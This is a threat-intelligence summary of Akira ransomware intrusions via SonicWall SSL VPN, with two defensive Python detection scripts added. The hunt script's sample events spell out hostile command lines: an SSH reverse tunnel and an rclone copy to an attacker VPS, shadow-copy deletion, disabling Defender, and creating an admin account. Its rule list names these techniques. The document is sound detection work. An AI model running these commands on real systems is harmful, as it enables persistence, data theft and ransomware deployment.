Since July 2025, the Akira ransomware campaign has been gaining entry through the SSL VPN on SonicWall NSA and TZ series devices running SonicOS 6 through 8. Researchers suspect the operators are reusing credentials harvested through earlier exploitation of CVE-2024-40766, because the logins keep succeeding on devices whose firmware has since been updated. The intrusions are notable for their speed: once a login succeeds, the actors spread across the network within minutes. They also get past OTP-based MFA, suggesting that the stolen material may include OTP seeds as well as passwords. The initial logins frequently come from VPS providers or consumer privacy VPNs, which administrators should treat as a red flag.
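As an added example (not code from the article or from SonicWall), the following script triages SSL VPN login records for the two warning signs just described: a successful login whose source address sits in a VPS or privacy-VPN range, and an account appearing from a source network it has never used before. The key="value" line layout, the message text, the user names, the addresses and the suspect-range list are all constructed for the example and are not exact SonicOS log syntax; in practice the range list would come from a curated hosting/VPN feed and the baseline from historical logs. It also groups alerts by source address, so that one address logging into several accounts in quick succession stands out.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed stand-ins: a curated feed of VPS / privacy-VPN ranges, and a
# per-user baseline of /24 source networks seen in normal use.
SUSPECT_RANGES = [ipaddress.ip_network("192.0.2.0/24")]
KNOWN_SOURCES = {"j.doe": {"198.51.100.0/24"}}
LOGIN_OK = "SSL VPN zone remote user login allowed"   # constructed message text

# Constructed SonicOS-style key="value" syslog lines (not real log data).
SAMPLE_LOGS = """\
time="2025-07-28 02:11:04" fw=203.0.113.1 msg="SSL VPN zone remote user login allowed" usr="j.doe" src=198.51.100.23
time="2025-07-28 02:14:52" fw=203.0.113.1 msg="SSL VPN zone remote user login allowed" usr="j.doe" src=198.51.100.23
time="2025-07-29 03:02:17" fw=203.0.113.1 msg="SSL VPN zone remote user login allowed" usr="j.doe" src=192.0.2.77
time="2025-07-29 03:02:20" fw=203.0.113.1 msg="SSL VPN zone remote user login allowed" usr="svc_backup" src=192.0.2.77
time="2025-07-29 03:40:11" fw=203.0.113.1 msg="SSL VPN zone remote user login allowed" usr="j.doe" src=192.0.2.80
time="2025-07-29 09:15:00" fw=203.0.113.1 msg="SSL VPN zone remote user login failed" usr="a.smith" src=198.51.100.40
"""

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line):
    """Split a key=value / key="quoted value" line into a dict."""
    return {key: quoted or bare for key, quoted, bare in KV_RE.findall(line)}


def source_net(ip):
    """The /24 a source address belongs to; used as the per-user baseline unit."""
    return ipaddress.ip_network(f"{ip}/24", strict=False)


def in_suspect_range(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SUSPECT_RANGES)


def triage(log_text, known_sources):
    """Return an alert for every successful login from a suspect range or from a
    /24 never seen for that account. Each login also extends the baseline, so a
    second login from the same new network is flagged only for the range."""
    seen = defaultdict(set)
    for user, nets in known_sources.items():
        seen[user] = {ipaddress.ip_network(n) for n in nets}
    alerts = []
    for line in log_text.splitlines():
        fields = parse_line(line)
        if fields.get("msg") != LOGIN_OK:
            continue                      # failures are interesting too, but not for this check
        user, src = fields["usr"], fields["src"]
        net = source_net(src)
        reasons = []
        if in_suspect_range(src):
            reasons.append("source in VPS/privacy-VPN range")
        if net not in seen[user]:
            reasons.append("new /24 for this user")
        seen[user].add(net)
        if reasons:
            alerts.append({"time": fields.get("time"), "user": user, "src": src, "reasons": reasons})
    return alerts


def shared_sources(alerts):
    """Source addresses that produced alerts for more than one account."""
    users = defaultdict(set)
    for alert in alerts:
        users[alert["src"]].add(alert["user"])
    return {src: sorted(names) for src, names in users.items() if len(names) > 1}


if __name__ == "__main__":
    found = triage(SAMPLE_LOGS, KNOWN_SOURCES)
    for alert in found:
        print(alert["time"], alert["user"], alert["src"], "; ".join(alert["reasons"]))
    print("shared sources:", shared_sources(found))
```

The baseline is keyed on the /24 rather than the exact address because home and mobile users move around inside a provider block; a tighter key produces noise, a looser one (ASN) needs an external lookup that is not available offline.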
Once inside a network, the attackers move fast. Within minutes of gaining access they begin scanning the internal network with tools such as SoftPerfect Network Scanner and Advanced IP Scanner, probing common service ports. Lateral movement relies on Impacket and RDP, and Active Directory is enumerated with nltest, dsquery and BloodHound. Reconnaissance output is consistently written to staging directories such as C:\ProgramData or a Temp folder, reflecting a methodical effort to map the victim environment before further compromise.
The attackers also hunt for high-value data, in particular virtual machine storage and backups, which often hold sensitive information and domain credentials. They use purpose-built tools to extract and decrypt the credentials stored by Veeam, and they have even temporarily modified PostgreSQL configuration to facilitate that access. For persistence they create new local and domain administrator accounts, install Remote Monitoring and Management (RMM) tools such as AnyDesk and TeamViewer, and set up covert channels with SSH reverse tunnels and Cloudflare Tunnel.
To stay undetected, the attackers use a range of evasion techniques. They disable existing RMM tools and delete Volume Shadow Copies to hinder response and recovery, they attempt to disable Windows Defender and other EDR products, and they have been observed using a BYOVD (Bring Your Own Vulnerable Driver) technique, repackaging legitimate Microsoft files to disguise the activity. Data is staged into WinRAR archives and exfiltrated to attacker-controlled VPS hosts with rclone or FileZilla.
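The post-login tool chain in the three paragraphs above (reconnaissance, persistence, defence evasion and exfiltration staging) is something a detection engineer can hunt for in process-creation telemetry. The following is an added example, not code from the article or from any vendor report it summarises. The event layout is loosely modelled on Sysmon event ID 1 fields, and the host names, users, timestamps and command lines are constructed; the rule patterns are the tools named in the text plus well-known command-line forms of them, with the Impacket wmiexec output redirection to \\127.0.0.1\ADMIN$ being an assumption about how "Impacket" shows up on an endpoint. The hunt goes one step beyond the text by correlating hits per host inside a time window, so that a burst spanning several tactic categories surfaces as a single finding rather than ten separate alerts.

```python
import re
from datetime import datetime, timedelta

# (category, rule name, pattern applied to "image cmdline"). Tool names come
# from the text; the command-line forms are common usages of those tools.
RULES = [
    ("recon", "SoftPerfect / Advanced IP Scanner",
     re.compile(r"\b(netscan|advanced_ip_scanner)\.exe", re.I)),
    ("recon", "AD enumeration with nltest / dsquery",
     re.compile(r"\b(nltest\.exe .*?/dclist|dsquery\.exe)", re.I)),
    ("recon", "BloodHound / SharpHound collector",
     re.compile(r"sharphound|bloodhound", re.I)),
    ("recon", "Impacket wmiexec output redirection (assumed on-host trace)",
     re.compile(r"cmd\.exe /Q /c .* 1> \\\\127\.0\.0\.1\\ADMIN\$\\__", re.I)),
    ("persistence", "new local or domain admin account",
     re.compile(r'\bnet1?(\.exe)? +(user \S+ .*/add|localgroup administrators .*/add'
                r'|group "domain admins" .*/add)', re.I)),
    ("persistence", "attacker-installed RMM (AnyDesk / TeamViewer)",
     re.compile(r"\b(anydesk|teamviewer)[\w-]*\.exe", re.I)),
    ("persistence", "SSH reverse tunnel or cloudflared",
     re.compile(r"\bssh(\.exe)? .*-R \d+:|\bcloudflared(\.exe)? .*tunnel", re.I)),
    ("evasion", "Volume Shadow Copy deletion",
     re.compile(r"\bvssadmin(\.exe)? .*delete shadows|\bwmic(\.exe)? .*shadowcopy delete", re.I)),
    ("evasion", "Defender real-time protection disabled",
     re.compile(r"Set-MpPreference .*-DisableRealtimeMonitoring", re.I)),
    ("evasion", "kernel driver service created (possible BYOVD)",
     re.compile(r"\bsc(\.exe)? +create .*type= *kernel", re.I)),
    ("exfil", "WinRAR archiving, rclone or FileZilla transfer",
     re.compile(r"\b(rar|winrar)(\.exe)? +a |\brclone(\.exe)? +(copy|sync|move)\b|\bfilezilla", re.I)),
]
STAGING_RE = re.compile(r"C:\\ProgramData\\|\\Temp\\", re.I)   # staging dirs named in the text


def t(hour, minute):
    return datetime(2025, 7, 29, hour, minute)


def ev(time, host, user, image, cmdline):
    return {"time": time, "host": host, "user": user, "image": image, "cmdline": cmdline}


SAMPLE_EVENTS = [  # constructed telemetry; one compromised workstation, one DC hit, one benign host
    ev(t(3, 5), "WS-FIN-07", r"CORP\j.doe", r"C:\ProgramData\netscan.exe",
       r"netscan.exe /range:10.0.0.1-10.0.0.254 /auto:C:\ProgramData\scan.xml"),
    ev(t(3, 7), "WS-FIN-07", r"CORP\j.doe", r"C:\Windows\System32\nltest.exe", "nltest /dclist:corp.local"),
    ev(t(3, 9), "DC01", r"CORP\svc_backup", r"C:\Windows\System32\cmd.exe",
       r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1753758540.77 2>&1"),
    ev(t(3, 14), "WS-FIN-07", r"CORP\j.doe", r"C:\Windows\System32\net.exe", "net user akira_adm Str0ngP@ss! /add"),
    ev(t(3, 15), "WS-FIN-07", r"CORP\j.doe", r"C:\Windows\System32\net.exe", "net localgroup administrators akira_adm /add"),
    ev(t(3, 18), "WS-FIN-07", r"CORP\j.doe", r"C:\Windows\System32\OpenSSH\ssh.exe",
       "ssh.exe -N -R 4443:127.0.0.1:3389 tunnel@203.0.113.9"),
    ev(t(3, 20), "WS-FIN-07", r"CORP\j.doe", r"C:\ProgramData\AnyDesk.exe",
       r"AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent"),
    ev(t(3, 22), "WS-FIN-07", r"CORP\j.doe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
       "powershell.exe -nop -c Set-MpPreference -DisableRealtimeMonitoring $true"),
    ev(t(3, 25), "WS-FIN-07", r"CORP\j.doe", r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    ev(t(3, 30), "WS-FIN-07", r"CORP\j.doe", r"C:\ProgramData\rar.exe",
       r"rar.exe a -r -hp C:\ProgramData\fin.rar \\FS01\Finance"),
    ev(t(3, 33), "WS-FIN-07", r"CORP\j.doe", r"C:\ProgramData\rclone.exe",
       r"rclone.exe copy C:\ProgramData\fin.rar vps:/loot --transfers 8"),
    ev(t(3, 40), "WS-HR-02", r"CORP\admin", r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe list shadows"),
]


def classify(event):
    """One hit per matching rule for a single process-creation event."""
    text = f'{event["image"]} {event["cmdline"]}'
    return [{"time": event["time"], "host": event["host"], "user": event["user"],
             "category": cat, "rule": name, "staged": bool(STAGING_RE.search(text))}
            for cat, name, pat in RULES if pat.search(text)]


def hunt(events, window_minutes=30, min_categories=3):
    """Group hits per host and report a finding whenever the hits inside one
    window cover at least min_categories of the recon/persistence/evasion/exfil chain."""
    window = timedelta(minutes=window_minutes)
    by_host = {}
    for event in events:
        for hit in classify(event):
            by_host.setdefault(hit["host"], []).append(hit)
    findings = []
    for host, hits in by_host.items():
        hits.sort(key=lambda h: h["time"])
        i = 0
        while i < len(hits):
            start = hits[i]["time"]
            group = [h for h in hits[i:] if h["time"] - start <= window]
            cats = sorted({h["category"] for h in group})
            if len(cats) >= min_categories:
                findings.append({"host": host, "start": start, "end": group[-1]["time"],
                                 "categories": cats, "rules": [h["rule"] for h in group],
                                 "staged": any(h["staged"] for h in group)})
                i += len(group)          # do not re-report the same burst
            else:
                i += 1
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f'{f["host"]}: {", ".join(f["categories"])} between {f["start"]:%H:%M} and {f["end"]:%H:%M}')
```

The single wmiexec-style hit on DC01 does not become a finding on its own, which is the intended trade-off: individual rules fire often enough in a large estate that the per-host burst across several categories is what an analyst should be paged for, while single hits are kept for pivoting once a burst is confirmed.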
The final step is deployment of the Akira ransomware executable, which is typically dropped in several locations and encrypts the whole environment within a few hours. Given how quickly this unfolds, the single most important mitigation is to reset all SSL VPN credentials on every SonicWall device that has ever run firmware vulnerable to CVE-2024-40766, including devices that have since been patched, because patching does not invalidate credentials that were already harvested. The reset must extend to the Active Directory accounts used for SSL VPN access and for LDAP synchronization.